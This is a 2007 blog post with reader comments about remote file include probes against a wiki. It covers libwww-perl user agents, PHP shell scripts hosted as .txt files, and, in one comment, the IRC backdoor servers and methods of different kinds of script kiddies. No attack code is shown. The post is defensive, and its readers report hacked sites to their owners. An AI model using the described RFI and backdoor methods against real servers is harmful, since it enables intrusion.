« Loads of new wiki users
Gmail phish »

libwww-perl and exploits

I’ve noticed some URL’s that are left in my logs. A path to my wiki, and then through some (working or not) redirect to somewhere else, that always ends in a ? I see many of those links in Google, so it’s possible the point is to get the URL’s into statistics summary pages.
Here’s an image with the code I found when accessing one of those pages. Usually they end in a 404, as the owners of the servers realize what is going on (I assume), but sometimes I see the code. I’m wondering what this code does to someone who browses to that page?

Questionable code image

The user agent is always some permutation of libwww-perl and the page where the code is located often has the extension .txt, making it seem harmless. After having seen several of these pages, the code seems slightlyl different for each time.

I originally meant to only provide one example of code, but I’ve seen some that went even further, and I’ll try and give examples of those too.

Here’s one that seems extremely fishy. Although it’s a text file, be careful when opening it! I noticed that the file was last changed November 4. What’s interesting about this particular domain name, was that a hacker left a message on another site with an e-mail address on that domain. And e-mail addresses from that domain has also been used for spam (not sure which type, since I can’t read the language of the site that collected those addresses).

Some other domains are on Yahoo’s servers (old Geocities, sometimes), and some of the sites appear to have been hacked. But the registration data seems wacked enough, I’m not sure. Here’s an example. That address doesn’t exist, and the phone number is from elsewhere in the US:

Domain Name………. baguscrew.net
Creation Date…….. 2007-10-24
Registration Date…. 2007-10-24
Expiry Date………. 2008-10-24
Organisation Name…. aris asmoro
Organisation Address. 565 ne norton ave
Organisation Address.
Organisation Address. bend
Organisation Address. 97701
Organisation Address. CO
Organisation Address. UNITED STATES

Here’s another code snippet.

This entry was posted on Friday, November 9th, 2007 at 11:00 am and is filed under Wiki spam. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

5 Responses to “libwww-perl and exploits”

  1. Alden Says:
    November 9th, 2007 at 6:03 pm

    I’ve been getting a lot of those type of hits, and have been trying, where I can, to inform the owners of the sites that they appear to have been hacked. Obviously the hackers aren’t monitoring the responses from the target servers, because all they’ve been getting from my sites are 404s. :P

  2. Roland Says:
    November 13th, 2007 at 4:11 am

    It’s a so called “PHP shell” where you can enter Linux commands and then they will be executed on the targeted server. Damn script-kiddies… :(

  3. David Clarke Says:
    November 15th, 2007 at 11:52 am

    The scripts are served as text/plain, but in vulnerable configurations, they use a PHP Include() command to be incorporated.

    I’ve been noticing quite a few of these for some time - and reporting them to the site owners, most of whom have been co-operative.

    I’ve described some of this Script Kiddie activity on my blog at http://www.dragonthoughts.com

  4. Igor Berger Says:
    November 30th, 2007 at 3:20 pm

    SpamHuntress, I always have an issue with how wordpress handles url rewrites.
    http://spamhuntress.com/?igor-the-troll

    This should not work but it does! Not only it can be a Google duplication penalty for lower trust sites, but a public relationship exploit for a brand if targated by gorilla warfare SEOs.

  5. admin Says:
    December 4th, 2007 at 9:04 am

    Lemat tried to post this, but it didn’t make it past the filters:

    This is Mic22 type PHP injection script (also known as Remote File
    Include), it is used by the hackers to determine if the scanned website is
    vulnerable or not. There are few types of script-kiddies:

    1) Lame: using c99, r57 type script to manually search and hack
    webservers, they try to use proxy to hide their IPs and free hostings to
    store their tools - sometimes along with website “I’m the
    supermastahacker”. User Agent is usually a real browser - Firefox, Opera
    and IE (!). Not a real threat. 2) Advanced: using Mic22 type, and Perl
    backdoor used to connect hacked webserver to the IRC server, where hacker
    can run commands from remote. Usually attacking IP is Brazillian
    200.0.0.0/7, 189.0.0.0/8. They store their tools on free hostings (like
    geocities) and previously hacked webservers. User Agent is usually “Indy
    Library” - they run Deplhi-made crawlers on their home computers
    (Windows). IRC servers are: irc.indoirc.net, bots.crewchat.org, brasilcrew
    and many more. Major threat due to amount of people. They usually “own”
    ~10-30 hacked webservers each. 3) Pro: they run crawlers on hacked
    webservers - User Agent string is “libwww”. A major thread due to amount
    of parallel Internet sweeps. 4) Pro+: there is a service on previously
    hacked webserver, usually listening at port 9991 instead (or parallel to)
    IRC server. I have seen hacker named xeQt in February 2007 with ~100
    webservers hacked during weekend (2 days). Currently this is a rare
    species.

    There is lots of Brazillians and Indonesians, few Italians, French, 3 were
    from Poland (yes, past tense). If you list channels on IRC server take a
    look at “scan! bug dork” descriptions.

Leave a Reply